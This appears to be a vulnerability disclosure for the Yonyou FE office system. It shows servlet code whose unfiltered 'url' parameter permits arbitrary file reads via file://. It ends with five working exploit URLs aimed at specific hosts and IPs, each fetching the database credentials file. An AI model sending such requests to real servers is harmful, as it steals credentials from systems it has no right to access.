### Brief description:

A protocol-handling interface in the Yonyou FE collaborative office system (用友FE协作办公系统) does not filter the file:// protocol, which results in an arbitrary file read vulnerability affecting all versions.

### Detailed description:

web.xml contains the following configuration:

```
<servlet>
    <servlet-name>ProxyServletUtil</servlet-name>
    <servlet-class>fe.witmanage.service.ProxyServletUtil</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>ProxyServletUtil</servlet-name>
    <url-pattern>/ProxyServletUtil</url-pattern>
</servlet-mapping>
```

The source of ProxyServletUtil.java is as follows:

```
public void doGet(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException
{
    // "url" is taken straight from the request, with no validation
    String urlString = request.getParameter("url");
    writeResponse(response, urlString);
}

private void writeResponse(HttpServletResponse response, String urlString) throws ServletException {
    try {
        // java.net.URL accepts any registered scheme, including file://
        URL url = new URL(urlString);
        URLConnection urlConnection = url.openConnection();
        response.setContentType(urlConnection.getContentType());
        InputStream ins = urlConnection.getInputStream();
        OutputStream outs = response.getOutputStream();
        byte[] buffer = new byte[this.READ_BUFFER_SIZE];
        int bytesRead = 0;
        // Copy whatever the URL resolves to back to the client
        while ((bytesRead = ins.read(buffer, 0, this.READ_BUFFER_SIZE)) != -1) {
            outs.write(buffer, 0, bytesRead);
        }
        System.out.println(outs);
        outs.flush();
        outs.close();
        ins.close();
    } catch (Exception e) {
        try {
            response.sendError(500, e.getMessage());
        } catch (IOException ioe) {
            throw new ServletException(ioe);
        }
    }
}
} // end of class (the class declaration is not shown in this excerpt)
```

The `url` parameter is attacker-controlled and is not filtered in any way, which leads to arbitrary file read. Because of how the code works, reading a file requires the file:// protocol.

### Proof of vulnerability:

```
(1) http://oa.hzuf.com:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties
(2) http://fsd2014.f3322.org:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties
(3) http://183.129.249.246:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties
(4) http://218.205.208.22:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties
(5) http://120.196.116.3:7321/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties
```